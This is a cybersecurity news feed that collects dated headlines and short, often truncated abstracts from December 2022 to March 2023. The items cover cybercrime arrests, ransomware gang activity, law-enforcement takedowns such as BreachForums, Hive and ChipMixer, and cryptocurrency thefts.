Security Affairs


March 18, 2023

Pompompurin Unmasked: Infamous BreachForums Mastermind Arrested in New York Full Text

Abstract U.S. law enforcement authorities have arrested a New York man in connection with running the infamous BreachForums hacking forum under the online alias "Pompompurin." The development, first reported by Bloomberg Law, comes after News 12 Westchester, earlier this week, said that federal investigators "spent hours inside and outside of a home in Peekskill." "At one point, investigators were seen removing several bags of evidence from the house," the New York-based local news service added. According to an affidavit filed by the Federal Bureau of Investigation (FBI), the suspect identified himself as Conor Brian Fitzpatrick and that he admitted to being the owner of the BreachForums website. "When I arrested the defendant on March 15, 2023, he stated to me in substance and in part that: a) his name was Conor Brian Fitzpatrick; b) he used the alias 'pompompurin,' and c) he was the owner and administrator of 'BreachForums,'

The Hacker News


March 16, 2023

Makop Ransomware Gang: A Detailed Look Full Text

Abstract Cybersecurity researcher Luca Mella shared technical insights on the Makop ransomware that attains persistence through dedicated .NET tools. To access victim networks, the gang makes use of internet-facing bugs and exposed remote administrative services. The operators began to work for their crimin ...

Cyware


March 16, 2023

Authorities Shut Down ChipMixer Platform Tied to Crypto Laundering Scheme Full Text

Abstract A coalition of law enforcement agencies across Europe and the U.S. announced the takedown of ChipMixer, an unlicensed cryptocurrency mixer that began its operations in August 2017. "The ChipMixer software blocked the blockchain trail of the funds, making it attractive for cybercriminals looking to launder illegal proceeds from criminal activities such as drug trafficking, weapons trafficking, ransomware attacks, and payment card fraud," Europol said in a statement. The coordinated exercise, besides dismantling the clearnet and dark web websites associated with ChipMixer, also resulted in the seizure of $47.5 million in Bitcoin and 7 TB of data. Mixers, also called tumblers, offer full anonymity for a fee by commingling cryptocurrency from different users – both legitimate and criminally-derived funds – in a manner that makes it hard to trace the origins. This is achieved by funneling different payments into a single pool before splitting up each amount and transmit

The Hacker News


March 15, 2023

Criminals already targeting nervous SVB customers Full Text

Abstract According to various researchers and security firms, threat actors are already out hunting for SVB-exposed prey through both passive and active phishing scams, including similar fake domains and business email compromise (BEC) attacks.

Cyware


March 14, 2023

LockBit Ransomware gang claims to have stolen SpaceX confidential data from Maximum Industries Full Text

Abstract The LockBit ransomware group claims to have stolen confidential data belonging to SpaceX from the systems of Maximum Industries. The LockBit ransomware gang claims to have stolen confidential data of SpaceX after they hacked the systems of production...

Security Affairs


March 14, 2023

LockBit Claims it Stole SpaceX Schematics From Parts Supplier, Threatens to Leak Them Full Text

Abstract Ransomware gang Lockbit has boasted it broke into Maximum Industries, which makes parts for SpaceX, and stole 3,000 proprietary schematics developed by Elon Musk's rocketeers.

Cyware


March 14, 2023

Dissecting the malicious arsenal of the Makop ransomware gang Full Text

Abstract Cyber security researcher Luca Mella analyzed the Makop ransomware employed in a recent intrusion. Executive summary Insights from a recent intrusion authored by Makop ransomware operators show persistence capability through dedicated .NET tools. Makop...

Security Affairs


March 10, 2023

Law enforcement seized the website selling the NetWire RAT and arrested a Croatian man Full Text

Abstract An international law enforcement operation seized the infrastructure associated with the NetWire RAT and resulted in the arrest of its administrator. A coordinated international law enforcement operation resulted in the seizure of the infrastructure...

Security Affairs


March 10, 2023

International Law Enforcement Takes Down Infamous NetWire Cross-Platform RAT Full Text

Abstract A coordinated international law enforcement exercise has taken down the online infrastructure associated with a cross-platform remote access trojan (RAT) known as NetWire. Coinciding with the seizure of the sales website www.worldwiredlabs[.]com, a Croatian national who is suspected to be the website's administrator has been arrested. While the suspect's name was not released, investigative journalist Brian Krebs identified Mario Zanko as the owner of the domain. "NetWire is a licensed commodity RAT offered in underground forums to non-technical users to carry out their own criminal activities," Europol's European Cybercrime Center (EC3) said in a tweet. Advertised since at least 2012, the malware is typically distributed via malspam campaigns and gives a remote attacker complete control over a Windows, macOS, or Linux system. It also comes with password-stealing and keylogging capabilities. The U.S. Department of Justice (DoJ) said an investiga

The Hacker News


March 9, 2023

Researchers Uncover Email Threats From Exotic Lily Full Text

Abstract Exotic Lily is an initial access broker who specializes in gathering credentials from high-value targets through employee impersonation, deep open-source intelligence (OSINT), and by creating convincing malicious documents.

Cyware


March 9, 2023

8220 Gang used new ScrubCrypt crypter in recent cryptojacking attacks Full Text

Abstract A threat actor tracked as 8220 Gang has been spotted using a new crypter called ScrubCrypt in cryptojacking campaigns. Fortinet researchers observed the mining group 8220 Gang using a new crypter called ScrubCrypt in cryptojacking attacks. "Between...

Security Affairs


March 08, 2023

Lazarus Group Exploits Zero-Day Vulnerability to Hack South Korean Financial Entity Full Text

Abstract The North Korea-linked Lazarus Group has been observed weaponizing flaws in an undisclosed software to breach a financial business entity in South Korea twice within a span of a year. While the first attack in May 2022 entailed the use of a vulnerable version of a certificate software that's widely used by public institutions and universities, the re-infiltration in October 2022 involved the exploitation of a zero-day in the same program. Cybersecurity firm AhnLab Security Emergency Response Center (ASEC) said it's refraining from mentioning the software owing to the fact that "the vulnerability has not been fully verified yet and a software patch has not been released." The adversarial collective, after obtaining an initial foothold by an unknown method, abused the zero-day bug to perform lateral movement, shortly after which the AhnLab V3 anti-malware engine was disabled via a BYOVD attack. It's worth noting here that the Bring Your Own Vulnerable Dr

The Hacker News


March 7, 2023

Vice Society Ransomware Group Claims Hamburg University of Applied Sciences as Latest Victim Full Text

Abstract The university warned that “significant amounts of data from various areas” were copied, including usernames and “cryptographically secured” passwords, email addresses, and mobile phone numbers.

Cyware


March 6, 2023

European police dismantled the DoppelPaymer ransomware gang Full Text

Abstract German police announced that they have dismantled an international cybercrime gang behind the DoppelPaymer ransomware operation. Europol has announced that an international operation conducted by law enforcement in Germany and Ukraine, with help of the US FBI and the Dutch...

Security Affairs


March 06, 2023

Core Members of DoppelPaymer Ransomware Gang Targeted in Germany and Ukraine Full Text

Abstract Law enforcement authorities from Germany and Ukraine have targeted suspected core members of a cybercrime group that has been behind large-scale attacks using DoppelPaymer ransomware. The operation, which took place on February 28, 2023, was carried out with support from the Dutch National Police (Politie) and the U.S. Federal Bureau of Investigation (FBI), according to Europol. This encompassed a raid of a German national's house as well as searches in the Ukrainian cities of Kiev and Kharkiv. A Ukrainian national was also interrogated. Both individuals are believed to have taken up crucial positions in the DoppelPaymer group. "Forensic analysis of the seized equipment is still ongoing to determine the exact role of the suspects and their links to other accomplices," the agency further said. DoppelPaymer, according to cybersecurity firm CrowdStrike, emerged in April 2019 and shares most of its code with another ransomware strain known as BitPaymer, which is attri

The Hacker News


March 01, 2023

Cybercriminals Targeting Law Firms with GootLoader and FakeUpdates Malware Full Text

Abstract Six different law firms were targeted in January and February 2023 as part of two disparate threat campaigns distributing GootLoader and FakeUpdates (aka SocGholish) malware strains. GootLoader, active since late 2020, is a first-stage downloader that's capable of delivering a wide range of secondary payloads such as Cobalt Strike and ransomware. It notably employs search engine optimization (SEO) poisoning to funnel victims searching for business-related documents toward drive-by download sites that drop the JavaScript malware. In the campaign detailed by cybersecurity company eSentire, the threat actors are said to have compromised legitimate, but vulnerable, WordPress websites and added new blog posts without the owners' knowledge. "When the computer user navigates to one of these malicious web pages and hits the link to download the purported business agreement, they are unknowingly downloading GootLoader," eSentire researcher Keegan Keplinger said

The Hacker News


February 27, 2023

Dutch Police arrests 3 men involved in a massive extortion scheme. One of them is an ethical hacker Full Text

Abstract The Dutch police arrested three individuals as a result of an investigation into computer trespass, data theft, extortion, and money laundering. The Dutch police announced the arrest of three men as the result of an extensive investigation...

Security Affairs


February 27, 2023

Dutch Police Arrest 3 Hackers Involved in Massive Data Theft and Extortion Scheme Full Text

Abstract The Dutch police announced the arrest of three individuals in connection with a "large-scale" criminal operation involving data theft, extortion, and money laundering. The suspects include two 21-year-old men from Zandvoort and Rotterdam and an 18-year-old man without a permanent residence. The arrests were made on January 23, 2023. It's estimated that the hackers stole personal data belonging to tens of millions of individuals. This comprised names, addresses, telephone numbers, dates of birth, bank account numbers, credit cards, passwords, license plates, social security numbers, and passport details. The Politie said its cybercrime team started the investigation nearly two years ago, in March 2021, after a large Dutch company suffered a security breach. The name of the company was not disclosed but some of the firms that were hit by a cyber attack around that time included RDC, Shell, and Ticketcounter, the last of which was also a victim of an extortion att

The Hacker News


February 27, 2023

Russian cybercrime alliances upended by Ukraine invasion Full Text

Abstract According to researchers, the so-called "brotherhood" of Russian-speaking cybercriminals is yet another casualty of the war in Ukraine, albeit one that few outside of Moscow are mourning.

Cyware


February 24, 2023

The alleged author of NLBrute Malware was extradited to US from Georgia Full Text

Abstract Dariy Pankov, a Russian VXer behind the NLBrute malware, has been extradited to the United States from Georgia. The Russian national Dariy Pankov, aka dpxaker, is suspected to be the author of the NLBrute malware. The man has been extradited to the United...

Security Affairs


February 21, 2023

HardBit ransomware gang adjusts their demands so the insurance company would cover the ransom cost Full Text

Abstract The recently emerged HardBit ransomware gang adjusts its demands so that the victim's insurance company would cover the ransom cost. The HardBit ransomware group first appeared on the threat landscape in October 2022, but unlike other ransomware operations, it doesn't...

Security Affairs


February 20, 2023

Norway Seizes $5.84 Million in Cryptocurrency Stolen by Lazarus Hackers Full Text

Abstract Norwegian police agency Økokrim has announced the seizure of 60 million NOK (about $5.84 million) worth of cryptocurrency stolen by the Lazarus Group in March 2022 following the Axie Infinity Ronin Bridge hack. "This case shows that we also have a great capacity to follow the money on the blockchain, even if the criminals use advanced methods," the agency said in a statement. The development comes more than 10 months after the U.S. Treasury Department implicated the North Korea-backed hacking group for the theft of $620 million from the Ronin cross-chain bridge. Then in September 2022, the U.S. government announced the recovery of more than $30 million worth of cryptocurrency, representing 10% of the stolen funds. Økokrim said it worked with international law enforcement partners to follow and piece together the money trail, thereby making it more difficult for criminal actors to carry out money laundering activities. "This is money that can support North Kor

The Hacker News


February 20, 2023

Spain Orders Extradition of British Alleged Hacker to US Full Text

Abstract Spain’s National Court has agreed to the extradition to the US of a British citizen who allegedly took part in computer attacks, including the July 2020 hacking of Twitter accounts of public figures such as Joseph Biden, Barack Obama, and Bill Gates.

Cyware


February 9, 2023

US and UK sanctioned seven Russian members of Trickbot gang Full Text

Abstract The US and the UK have sanctioned seven Russian individuals for their involvement in the TrickBot operations. The US and the UK authorities have sanctioned seven Russian individuals for their involvement in the TrickBot operations. The US Treasury...

Security Affairs


February 9, 2023

Experts published a list of proxy IPs used by the pro-Russia group Killnet Full Text

Abstract SecurityScorecard’s researchers released a list of proxy IPs used by the pro-Russia group Killnet to neutralize its attacks. SecurityScorecard’s researchers published a list of proxy IPs used by the pro-Russia group Killnet with the intent to interfere...

Security Affairs


February 8, 2023

Russian national pleads guilty to money laundering linked to Ryuk Ransomware operation Full Text

Abstract A Russian national pleaded guilty in the U.S. to money laundering charges linked to the Ryuk ransomware operation. On February 7, 2023, Russian national Denis Mihaqlovic Dubnikov (30) pleaded guilty in the U.S. to one count of conspiracy to commit...

Security Affairs


February 8, 2023

Hong Kong police and Interpol uncover servers used by global phishing syndicate Full Text

Abstract Bogus apps impersonated banks, media players, and others to steal data from victims’ smartphones. Registered subscribers for servers were individuals in mainland China, the Philippines, and Cambodia.

Cyware


February 08, 2023

Russian Hacker Pleads Guilty to Money Laundering Linked to Ryuk Ransomware Full Text

Abstract A Russian national on February 7, 2023, pleaded guilty in the U.S. to money laundering charges and for attempting to conceal the source of funds obtained in connection with Ryuk ransomware attacks. Denis Mihaqlovic Dubnikov, 30, was arrested in Amsterdam in November 2021 before he was extradited from the Netherlands in August 2022. He is awaiting sentencing on April 11, 2023. "Between at least August 2018 and August 2021, Dubnikov and his co-conspirators laundered the proceeds of Ryuk ransomware attacks on individuals and organizations throughout the United States and abroad," the Department of Justice (DoJ) said. Dubnikov and his accomplices are said to have engaged in various criminal schemes designed to obscure the trail of the ill-gotten proceeds. According to DoJ, a chunk of the 250 Bitcoin ransom paid by a U.S. company in July 2019 after a Ryuk attack was sent to Dubnikov in exchange for about $400,000. The crypto was subsequently converted to Tether and trans

The Hacker News


February 07, 2023

Encrypted Messaging App Exclu Used by Criminal Groups Cracked by Joint Law Enforcement Full Text

Abstract A joint law enforcement operation conducted by Germany, the Netherlands, and Poland has cracked yet another encrypted messaging application named Exclu used by organized crime groups. Eurojust, in a press statement, said the February 3 exercise resulted in the arrests of 45 individuals across Belgium and the Netherlands, some of whom include users as well as the administrators and owners of the service. Authorities also launched raids in 79 locations, leading to the seizure of €5.5 million in cash, 300,000 ecstasy tablets, 20 firearms, and 200 phones. Two drug laboratories have further been shut down. Investigation into Exclu is said to have commenced in Germany as far back as June 2020. The application, prior to its takedown, had an estimated 3,000 users, of which 750 are Dutch speakers. The Politie, in an announcement of its own, noted that it was able to gain covert access to the service, permitting the agency to read messages sent by its users for the past five months.

The Hacker News


February 06, 2023

Microsoft: Iranian Nation-State Group Sanctioned by U.S. Behind Charlie Hebdo Hack Full Text

Abstract An Iranian nation-state group sanctioned by the U.S. government has been attributed to the hack of the French satirical magazine Charlie Hebdo in early January 2023. Microsoft, which disclosed details of the incident, is tracking the activity cluster under its chemical element-themed moniker NEPTUNIUM, which is an Iran-based company known as Emennet Pasargad. In January 2022, the U.S. Federal Bureau of Investigation (FBI) tied the state-backed cyber unit to a sophisticated influence campaign carried out to interfere with the 2020 presidential elections. Two Iranian nationals have been accused of their role in the disinformation and threat campaign. Microsoft's disclosure comes after a "hacktivist" group named Holy Souls (now identified as NEPTUNIUM) claimed to be in possession of the personal information of more than 200,000 Charlie Hebdo customers, including their full names, telephone numbers, and home and email addresses. The breach, which allowed NEPTUNIU

The Hacker News


February 6, 2023

Finland’s Most-Wanted Hacker Nabbed in France Full Text

Abstract In late October 2022, Julius “Zeekill” Kivimäki was charged (and “arrested in absentia,” according to the Finns) with attempting to extort money from the Vastaamo Psychotherapy Center.

Cyware


January 29, 2023

Alleged member of ShinyHunters group extradited to the US, could face 116 years in jail Full Text

Abstract An alleged member of the ShinyHunters cybercrime gang has been extradited from Morocco to the United States. Sebastien Raoult, a French national who is suspected of being a member of the ShinyHunters cybercrime gang, known as "Seyzo Kaizen," has been extradited...

Security Affairs


January 28, 2023

Copycat Criminals mimicking Lockbit gang in northern Europe Full Text

Abstract Recent reports of Lockbit locker-based attacks against North European SMBs indicate that local crooks started using Lockbit locker variants. Executive Summary During the past months, the Lockbit gang reached very high popularity in the underground...

Security Affairs


January 27, 2023

Justice Department Thwarts ‘Hive’ Ransomware Scheme Full Text

Abstract The Justice Department announces a successful campaign countering ransomware attacks by the Hive cybercriminal network.

Lawfare


January 27, 2023

Hacker accused of having stolen personal data of all Austrians and more Full Text

Abstract A Dutch hacker who was arrested at the end of last year claims to have stolen the personal data of almost all Austrians. At the end of November 2022, the Amsterdam police arrested a 25-year-old man from Almere who is suspected of having stolen...

Security Affairs


January 27, 2023

BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer Full Text

Abstract The BlackCat Ransomware group claims to have hacked SOLAR INDUSTRIES INDIA and to have stolen 2TB of "secret military data." The BlackCat Ransomware gang added SOLAR INDUSTRIES INDIA to the list of victims published on its Tor leak site. The company...

Security Affairs


January 27, 2023

Experts Uncover the Identity of Mastermind Behind Golden Chickens Malware Service Full Text

Abstract Cybersecurity researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona "badbullzvenom." eSentire's Threat Response Unit (TRU), in an exhaustive report published following a 16-month-long investigation, said it "found multiple mentions of the badbullzvenom account being shared between two people." The second threat actor, known as Frapstar, is said to identify themselves as "Chuck from Montreal," enabling the cybersecurity firm to piece together the criminal actor's digital footprint. This includes his real name, pictures, home address, the names of his parents, siblings, and friends, along with his social media accounts and his interests. He is also said to be the sole proprietor of a small business that's run from his own home. Golden Chickens, also known as Venom Spider, is a malware-as-a-service (MaaS) provider that's linked to a variet

The Hacker News


January 26, 2023

Hive Ransomware Infrastructure Seized in Joint International Law Enforcement Effort Full Text

Abstract In what's a case of hacking the hackers, the darknet infrastructure associated with the Hive ransomware-as-a-service (RaaS) operation has been seized as part of a coordinated law enforcement effort involving 13 countries. "Law enforcement identified the decryption keys and shared them with many of the victims, helping them regain access to their data without paying the cybercriminals," Europol said in a statement. The U.S. Department of Justice (DoJ) said the Federal Bureau of Investigation (FBI) covertly infiltrated the Hive database servers in July 2022 and captured 336 decryption keys that were then handed over to companies compromised by the gang, effectively saving $130 million in ransom payments. The FBI also distributed more than 1,000 additional decryption keys to previous Hive victims, the DoJ noted, stating the agency gained access to two dedicated servers and one virtual private server at a hosting provider in California that were leased using three em

The Hacker News


January 26, 2023

Dutch police arrest man who ‘stole private info belonging to tens of millions’ Full Text

Abstract The 25-year-old now faces charges of violating data privacy and computer trespassing laws, and laundering cryptocurrency valued at around $491,000, according to media reports.

Cyware


January 26, 2023

Hive Ransomware Tor leak site apparently seized by law enforcement Full Text

Abstract The leak site of the Hive ransomware gang was seized due to an international operation conducted by law enforcement in ten countries. The Tor leak site used by Hive ransomware operators has been seized as part of an international operation conducted...

Security Affairs


January 24, 2023

FBI Says North Korean Hackers Behind $100 Million Horizon Bridge Crypto Theft Full Text

Abstract The U.S. Federal Bureau of Investigation (FBI) on Monday confirmed that North Korean threat actors were responsible for the theft of $100 million in cryptocurrency assets from Harmony Horizon Bridge in June 2022. The law enforcement agency attributed the hack to the Lazarus Group and APT38 (aka BlueNoroff, Copernicium, and Stardust Chollima), the latter of which is a North Korean state-sponsored threat group that specializes in financial cyber operations. The FBI further stated the Harmony intrusion leveraged an attack campaign dubbed TraderTraitor that was disclosed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in April 2022. The modus operandi entailed utilizing social engineering tricks to deceive employees of cryptocurrency companies into downloading rogue applications as part of a seemingly benign recruitment effort. "On Friday, January 13, 2023, North Korean cyber actors used RAILGUN, a privacy protocol, to launder over $60 million worth of

The Hacker News


January 23, 2023

PLAY Ransomware Group Claims Attack on Britain’s Arnold Clark Full Text

Abstract Sensitive personal data allegedly stolen from Arnold Clark, one of the United Kingdom’s largest car dealerships, has been posted online by the PLAY ransomware group on its extortion site.

Cyware


January 19, 2023

Bitzlato Crypto Exchange Founder Arrested for Aiding Cybercriminals Full Text

Abstract The U.S. Department of Justice (DoJ) on Wednesday announced the arrest of Anatoly Legkodymov (aka Gandalf and Tolik), the cofounder of Hong Kong-registered cryptocurrency exchange Bitzlato, for allegedly processing $700 million in illicit funds. The 40-year-old Russian national, who was arrested in Miami, was charged in a U.S. federal court with "conducting a money transmitting business that transported and transmitted illicit funds and that failed to meet U.S. regulatory safeguards, including anti-money laundering requirements," the DoJ said. According to court documents, Bitzlato is said to have advertised itself as a virtual currency exchange with minimal identification requirements for its users, breaking the rules requiring the vetting of customers. This lack of know your customer (KYC) enforcement led to the service becoming a "haven for criminal proceeds" and facilitating transactions worth more than $700 million on the Hydra darknet marketplace prior

The Hacker News


January 16, 2023

Europol arrested cryptocurrency scammers that stole millions from victims Full Text

Abstract An international police operation led by Europol led to the arrest of cryptocurrency scammers targeting users all over the world. An international law enforcement operation conducted by authorities from Bulgaria, Cyprus, Germany and Serbia, supported...

Security Affairs


January 16, 2023

Undercover with the Leader of Lockbit Full Text

Abstract LockBitSupp’s focus on professionalizing the group is part of the reason why Lockbit has found such success in the cybercriminal world – the group accounted for 44 percent of the total ransomware attacks launched last year.

Cyware


January 15, 2023

Hacker stole credit cards from the website of Canada’s largest alcohol retailer LCBO Full Text

Abstract The Canadian Liquor Control Board of Ontario (LCBO), the largest beverage alcohol retailer in the country, disclosed a Magecart attack. The Canadian Liquor Control Board of Ontario (LCBO), the largest beverage alcohol retailer in the country, disclosed...

Security Affairs


January 13, 2023

Cybercriminals Using Polyglot Files in Malware Distribution to Fly Under the Radar Full Text

Abstract Remote access trojans such as StrRAT and Ratty are being distributed as a combination of polyglot and malicious Java archive (JAR) files, once again highlighting how threat actors are continuously finding new ways to fly under the radar. "Attackers now use the polyglot technique to confuse security solutions that don't properly validate the JAR file format," Deep Instinct security researcher Simon Kenin said in a report. Polyglot files are files that combine syntax from two or more different formats in a manner such that each format can be parsed without raising any error. One such 2022 campaign spotted by the cybersecurity firm is the use of JAR and MSI formats – i.e., a file that's valid both as a JAR and an MSI installer – to deploy the StrRAT payload. This also means that the file can be executed by both Windows and Java Runtime Environment (JRE) based on how it's interpreted. Another instance involves the use of CAB and JAR polyglots to deliver bot

The Hacker News


January 9, 2023

Hive Ransomware Gang Leaked 550 GB Stolen From Consulate Health Care Full Text

Abstract The Hive ransomware gang this week added the company to its Tor leak site, threatening to publish the stolen data. The gang states that the attack took place on December 3rd, 2022 and the attack was disclosed on January 6, 2023.

Cyware


January 5, 2023

Threat actors stole Slack private source code repositories Full Text

Abstract Enterprise collaboration platform Slack disclosed a data breach, hackers stole some of its private source code repositories. The enterprise collaboration platform Slack has announced to have suffered a security breach, threat actors have stolen some...

Security Affairs


January 05, 2023

Bluebottle Cybercrime Group Preys on Financial Sector in French-Speaking African Nations Full Text

Abstract A cybercrime group dubbed Bluebottle has been linked to a set of targeted attacks against the financial sector in Francophone countries located in Africa from at least July 2022 to September 2022. "The group makes extensive use of living-off-the-land, dual use tools, and commodity malware, with no custom malware deployed in this campaign," Symantec, a division of Broadcom Software, said in a report shared with The Hacker News. The cybersecurity firm said the activity shares overlaps with a threat cluster tracked by Group-IB under the name OPERA1ER, which has carried out dozens of attacks aimed at banks, financial services, and telecom companies in Africa, Asia, and Latin America between 2018 and 2022. The attribution stems from similarities in the toolset used, the attack infrastructure, the absence of bespoke malware, and the targeting of French-speaking nations in Africa. Three different unnamed financial institutions in three African nations were breached, although

The Hacker News


January 1, 2023

Lockbit apologized for the attack on the SickKids pediatric hospital and releases a free decryptor Full Text

Abstract The LockBit ransomware group formally apologized for the attack on the Hospital for Sick Children (SickKids) and gave the victim a decryptor for free. The LockBit ransomware gang formally apologized for the attack on the Hospital for Sick Children...

Security Affairs


December 30, 2022

Multiple Malware For Sale on Darkweb Forums Full Text

Abstract Researchers have spotted a new threat group, dubbed PureCoder, selling multiple malware, including miners, information stealers, and crypters, on the dark web. Recently, Italian cyber security agency TG Soft identified that the PureLogs information stealer was used by Alibaba2044 threat actors ...

Cyware


December 28, 2022

30 Million Railway Customers’ Data for Sale On the Dark Web Full Text

Abstract Username, email, verified and verified mobile numbers, gender, city Id, City Name, state Id, and language preferences are among the data. Sample data by actor includes a number of records containing emails and phone numbers.

Cyware


December 28, 2022

Hackers Steal Power Utility Customer Data Full Text

Abstract A law firm handling breach notification for Sargent & Lundy estimates the hackers stole the personal data of more than 6,900 individuals. The Black Basta ransomware gang surfaced in April 2022. The group is known for using double-extortion tactics.

Cyware


December 27, 2022

Hackers stole $3 million worth of cryptocurrency from BTC.com Full Text

Abstract The BTC.com cryptocurrency platform was the victim of a cyberattack that resulted in the theft of $3 million worth of crypto assets. BTC.com is a website that provides services for managing and transferring Bitcoin, it offers a digital wallet for storing...

Security Affairs


December 27, 2022

Hackers steal $8 million from users running trojanized BitKeep apps Full Text

Abstract Multiple BitKeep crypto wallet users reported that their wallets were emptied during Christmas after hackers triggered transactions that didn't require verification.

BleepingComputer


December 27, 2022

North Korean Hackers Steal NFTs via Phishing Websites Full Text

Abstract The attackers set up nearly 500 decoy sites, including that of a project associated with the World Cup, and NFT marketplaces OpenSea, X2Y2 and Rarible. They made off with $365,000 by stealing 1,055 NFTs with just one of those phishing addresses.

Cyware


December 26, 2022

Hacker claims to be selling Twitter data of 400 million users Full Text

Abstract A threat actor claims to be selling public and private data of 400 million Twitter users scraped in 2021 using a now-fixed API vulnerability. They're asking $200,000 for an exclusive sale.

BleepingComputer


December 26, 2022

Hackers Drain $8M in Assets from Bitkeep Wallets in Latest DeFi Exploit Full Text

Abstract One suspected hacker wallet address already has more than $5 million in digital assets. The amount exploited is still not final, and the attackers are still transferring funds to multiple wallet addresses.

Cyware


December 25, 2022

Vice Society Adds Custom-branded Payload PolyVice to its Arsenal Full Text

Abstract The Vice Society ransomware group spun another custom ransomware variant, dubbed PolyVice. The strain deploys a robust encryption scheme that uses NTRUEncrypt and ChaCha20-Poly1305 algorithms. The authors of this new ransomware variant are also likely selling similar payloads to other hacking groups ...

Cyware


December 23, 2022

Vice Society Group May Have Outsourced the Development of ‘PolyVice’ Ransomware Full Text

Abstract Researchers say it's likely that the group behind the custom-branded PolyVice ransomware for Vice Society is also selling similar payloads to other groups. It implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms.

Cyware


December 22, 2022

Vice Society ransomware gang is using a custom locker Full Text

Abstract The Vice Society ransomware group has adopted new custom ransomware, with a strong encryption scheme, in recent intrusions. SentinelOne researchers discovered that the Vice Society ransomware gang has started using a custom ransomware that implements...

Security Affairs


December 22, 2022

North Korea-linked hackers stole $626 million in virtual assets in 2022 Full Text

Abstract North Korea-linked threat actors have stolen an estimated $1.2 billion worth of cryptocurrency and other virtual assets in the past five years. South Korea’s spy agency, the National Intelligence Service, estimated that North Korea-linked threat...

Security Affairs


December 21, 2022

Russian Killnet Hacker Group Claims Data Theft of 10,000 FBI Agents Full Text

Abstract The Russian hacker group, KillNet, claims to have infiltrated an FBI database, allegedly stealing the personal information of more than 10,000 US federal agents. Like their other attacks, this alleged hack also appears to have political undertones.

Cyware


December 20, 2022

Ransomware gang uses new Microsoft Exchange exploit to breach servers Full Text

Abstract Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA).

BleepingComputer


December 20, 2022

Infamous hacker steals 14 BAYCs worth over $1 million Full Text

Abstract According to @serpent, the hacker contacted the victim and asked to license IP rights for BAYC #2060. They claimed to be a casting director for Forte Pictures, an L.A.-based Emmy Award-winning company. The alias the scammer used was fake.

Cyware


December 20, 2022

Google Ad fraud campaign used adult content to make millions Full Text

Abstract A massive advertising fraud campaign using Google Ads and 'popunders' on adult sites is estimated to have generated millions of ad impressions on stolen articles, making the fraudsters an estimated $275k per month.

BleepingComputer


December 15, 2022

FBI seized 48 domains linked to DDoS-for-Hire service platforms Full Text

Abstract The U.S. Department of Justice (DoJ) seized forty-eight domains that offered DDoS-for-Hire Service Platforms to crooks. The U.S. Department of Justice (DoJ) this week announced the seizure of 48 domains associated with the DDoS-for-Hire Service platforms...

Security Affairs


December 14, 2022

FBI seized domains linked to 48 DDoS-for-hire service platforms Full Text

Abstract The US Department of Justice has seized 48 Internet domains and charged six suspects for their involvement in running 'Booter' or 'Stresser' platforms that allow anyone to easily conduct distributed denial of service attacks.

BleepingComputer


December 14, 2022

The Dark Web is Getting Darker - Ransomware Thrives on Illegal Markets Full Text

Abstract The dark web is getting darker as cybercrime gangs increasingly shop their malware, phishing, and ransomware tools on illegal cybercrime markets.

BleepingComputer


December 13, 2022

Lockbit ransomware gang hacked California Department of Finance Full Text

Abstract LockBit ransomware gang hacked the California Department of Finance and threatens to leak data stolen from its systems. The LockBit ransomware gang claims to have stolen 76Gb from the California Department of Finance and is threatening to leak the stolen...

Security Affairs


December 09, 2022

Australia arrests ‘Pig Butchering’ suspects for stealing $100 million Full Text

Abstract The Australian Federal Police (AFP) have arrested four suspected members of a financial investment scam syndicate estimated to have stolen $100 million from victims worldwide.

BleepingComputer


December 8, 2022

Cybercriminals Attacking Each Other Gives Defenders Access to Inside Info Full Text

Abstract Researchers discovered a new sub-economy linked to cybercriminal activity: hackers scamming each other for millions of dollars. This practice led to the emergence of arbitration rooms in forums to settle conflicts.

Cyware


December 08, 2022

Automated dark web markets sell corporate email accounts for $2 Full Text

Abstract Cybercrime marketplaces are increasingly selling stolen corporate email addresses for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks.

BleepingComputer


December 7, 2022

Ransomware group Vice Society targeted dozens of schools in 2022, new report finds Full Text

Abstract More than 40 educational organizations, including 15 in the United States, suffered ransomware attacks launched by the cybercriminal group known as Vice Society, researchers at Palo Alto Networks revealed in a report published Tuesday.

Cyware


December 07, 2022

CryptosLabs ‘pig butchering’ ring stole up to $505 million since 2018 Full Text

Abstract A previously unknown investment scam group named 'CryptosLabs' has stolen up to €480 million ($505 million) from victims in France, Belgium, and Luxembourg, since the launch of its operation in 2018.

BleepingComputer


December 06, 2022

Suspects arrested for hacking US networks to steal employee data Full Text

Abstract Four men suspected of hacking into US networks to steal employee data for identity theft and the filing of fraudulent US tax returns have been arrested in London, UK, and Malmo, Sweden, at the request of the U.S. law enforcement authorities.

BleepingComputer


December 5, 2022

India: Hackers Selling Personal Data Of 150,000 Patients From Tamil Nadu Hospital On Dark Web Full Text

Abstract The seller shared a sample as proof, showing data records dated from the years 2007-2011. The data set of 150,000 records of patients' information includes their name, guardian name, date of birth, doctor's details, and address information.

Cyware


December 5, 2022

DuckLogs Advertises its Features and MaaS Capabilities on Cybercrime Forums Full Text

Abstract Cyble research team has unearthed a new MaaS operation dubbed DuckLogs. It reportedly offers beginners and other cyber attackers easy access to malicious modules. DuckLogs mainly includes an information stealer and a RAT component. The malware is most likely distributed using spam or phishing email ...

Cyware


December 3, 2022

Cybercriminal Organizations Offer Record High Reward for Signal App Zero-Days Full Text

Abstract The market for gray-market exploit brokers is growing, and much of the credit goes to an ongoing bidding war in which a new entrant has bid millions for Signal messaging app zero-days. The reasons behind this bidding war include an overwhelming 80% market share of Android in Ukraine and ...

Cyware


December 2, 2022

Cuba Ransomware received over $60M in Ransom payments as of August 2022 Full Text

Abstract Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million...

Security Affairs


December 02, 2022

Police arrest 55 members of ‘Black Panthers’ SIM Swap gang Full Text

Abstract The Spanish National Police have arrested 55 members of the 'Black Panthers' cybercrime group, including one of the organization's leaders based in Barcelona.

BleepingComputer


December 2, 2022

Ransomware group may have stolen customer bank details from British water company Full Text

Abstract The affected details include the names and addresses associated with customers’ accounts as well as the bank details used to set up direct debit payments. The company said it is writing letters to the affected customers.

The Record


Dec 02, 2022
